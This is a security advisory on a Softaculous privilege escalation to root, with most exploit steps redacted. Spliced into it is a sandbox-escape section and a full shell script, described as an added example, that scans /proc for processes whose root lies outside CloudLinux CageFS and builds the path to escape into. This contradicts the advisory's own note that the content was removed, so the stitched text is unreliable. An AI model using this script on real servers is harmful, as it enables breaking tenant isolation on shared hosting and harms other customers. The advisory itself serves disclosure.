Vulnerability

Note: Due to the very simple exploitation technique, the whole content was removed. Details might be revealed later.

Affected software: Softaculous Auto Installer versions below 5.6.5 for CentOS Web Panel, DirectAdmin and ISPmanager.

Softaculous ▒▒▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒ ▒▒▒▒▒▒▒ ▒▒▒ ▒▒ ▒▒ ▒▒▒▒ ▒▒▒ ▒▒▒ ▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒, ▒▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒▒▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒ ▒▒▒ ▒▒▒▒ ▒▒▒▒▒▒▒▒▒, which in turn results in root privilege escalation.

The vulnerability is not exploitable inside CloudLinux CageFS due to ▒▒▒▒▒▒ ▒▒▒▒▒. However, thanks to the vulnerability fixed with KMODLVE-385, at the time of discovery pretty much every system was vulnerable to a CageFS bypass, because the patched LVE kernel module requires a reboot, or at least stopping all services, to reload the LVE module.

Exploit

If you are inside CageFS on a system that is still vulnerable to the bug fixed with KMODLVE-385, run ls -ld /proc/*/root/tmp. Inside CageFS the /tmp you see is your own private one, so if a /proc/<pid>/root/tmp is owned by root, that process's root directory is outside CageFS. In practice only processes running as your own user are readable under /proc/<pid>/root, so those are the candidates. On CloudLinux 7 you might need to, for example, execute a DirectAdmin plugin and hit the exact moment the plugin is running. On CloudLinux 8 there is usually an unconfined systemd process running as the user. Change to your home directory outside CageFS with cd /proc/<pid>/root/home/<user> and continue with the instructions below.
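The /proc/*/root/tmp check above, turned into a small script. This is an added example and not part of the original advisory: the function names find_outside_cagefs and escape_path are my own, and the directory to scan and the uid treated as "root" are parameters (an assumption for this example) so the same logic can be exercised on a constructed directory tree. It assumes a Linux system with /proc mounted and a POSIX ls that supports -n.

```shell
#!/bin/sh
# Added example, not code from the original advisory. Enumerates processes
# whose /proc/<pid>/root/tmp is owned by root, i.e. processes whose root
# directory is outside CageFS (inside CageFS /tmp is the user's private one).
# Assumes Linux with /proc mounted and a POSIX ls supporting -n.

# Print the numeric owner uid of path $1, or nothing if it cannot be read
# (for instance /proc/<pid>/root of a process you are not allowed to inspect).
owner_uid() {
    ls -ldn "$1" 2>/dev/null | awk '{ print $3 }'
}

# find_outside_cagefs [PROCDIR] [ROOT_UID]
# PROCDIR defaults to /proc and ROOT_UID to 0. Both are parameters only so the
# check can be run against a constructed tree (assumption for this example).
# Prints "<pid> <root-path>" for every candidate escape root.
find_outside_cagefs() {
    procdir=${1:-/proc}
    root_uid=${2:-0}
    for entry in "$procdir"/[0-9]*; do
        [ -d "$entry" ] || continue
        pid=${entry##*/}
        uid=$(owner_uid "$entry/root/tmp")
        [ -n "$uid" ] || continue          # unreadable root or no tmp: skip
        if [ "$uid" -eq "$root_uid" ]; then
            printf '%s %s\n' "$pid" "$entry/root"
        fi
    done
}

# Build the path the advisory tells you to cd into for a candidate pid.
escape_path() {
    printf '/proc/%s/root/home/%s\n' "$1" "$2"
}

# Stand-alone use: ./find_escape.sh --scan lists candidates on the live system
# and the cd target for each, using the current username.
if [ "${1:-}" = "--scan" ]; then
    find_outside_cagefs | while read -r pid root; do
        echo "candidate pid $pid (root at $root): cd $(escape_path "$pid" "$(id -un)")"
    done
fi
```

The scan silently skips every /proc/<pid>/root it cannot read, which is the normal case for other users' processes; an empty result therefore means no readable process with a real root was found at that moment, not that the bypass is fixed, which is why the advisory suggests retrying while a plugin or user-level systemd process is running.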

Create ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒▒▒ ▒▒▒▒ ▒▒▒▒▒▒▒▒▒ ▒▒▒▒ ▒▒▒ ▒▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒:

▒▒▒▒▒▒▒▒▒▒▒
▒▒ ▒▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

Next, ▒▒▒ ▒▒▒ ▒▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒ ▒▒ ▒▒▒▒:

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

Check output file:

cat out.log

Output:

uid=0(root) gid=0(root) groups=0(root),1000(test)

Solution

Update Softaculous to version 5.6.5 or later.

Timeline

  • 2021-02-15 - Vulnerability reported to vendor.
  • 2021-02-16 - Response from vendor; Softaculous version 5.6.5 released with the vulnerability fixed. According to the vendor, the same vulnerability was reported by Rack911 a few hours before my report.